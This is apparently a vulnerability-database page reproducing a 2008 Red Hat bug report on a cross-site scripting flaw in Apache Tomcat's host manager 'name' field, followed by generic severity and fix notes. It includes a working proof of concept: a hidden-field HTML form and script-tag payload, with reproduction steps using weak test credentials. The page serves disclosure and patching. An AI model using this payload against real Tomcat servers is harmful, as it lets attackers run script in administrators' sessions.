First published: Wed May 14 2008(Updated: )
Similarly as "alias" field in <a class="bz_bug_link bz_status_CLOSED bz_closed bz_public " title="CLOSED ERRATA - CVE-2007-3386 tomcat host manager xss" href="show_bug.cgi?id=247994">bug 247994</a> tomcat's host manager web interface suffers from javascript exploit in the "name" field: Assume that after logged in, the victim was lead to the malicious web server with following file installed. <form action="<a href="http://localhost:8080/host-manager/html/add">http://localhost:8080/host-manager/html/add</a>" method="get"> <INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>"> <INPUT TYPE="hidden" NAME='aliases' VALUE="somealias"> <input type="submit"> </form> Steps to reproduce: * install tomcat5 tomcat5-admin-webapps. * edit /etc/tomcat5/tomcat-users.xml and add <role rolename="tomcat"/> <user username="tomcat" password="tomcat" roles="tomcat,admin"/> * restart tomcat5 * Visit <a href="http://localhost:8080/host-manager/html/add">http://localhost:8080/host-manager/html/add</a> * login with user name tomcat and password tomcat * Enter the following: name: <script>alert("name-exploit!")</script> alias: somealias * hit add. * You should see the javascript alert box popping up.
Affected Software | Affected Version | How to fix |
---|---|---|
Tomcat |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
The severity level of REDHAT-BUG-446393 is considered moderate as it relates to a cross-site scripting vulnerability in the Apache Tomcat host manager interface.
To fix REDHAT-BUG-446393, it is recommended to upgrade to the latest version of Apache Tomcat that includes the patch for this vulnerability.
REDHAT-BUG-446393 specifically affects the Apache Tomcat host manager web interface.
The potential impacts of REDHAT-BUG-446393 include unauthorized access and manipulation of web applications through cross-site scripting attacks.
REDHAT-BUG-446393 was reported as part of ongoing vulnerability tracking for Apache Tomcat and is linked to previous bugs related to cross-site scripting.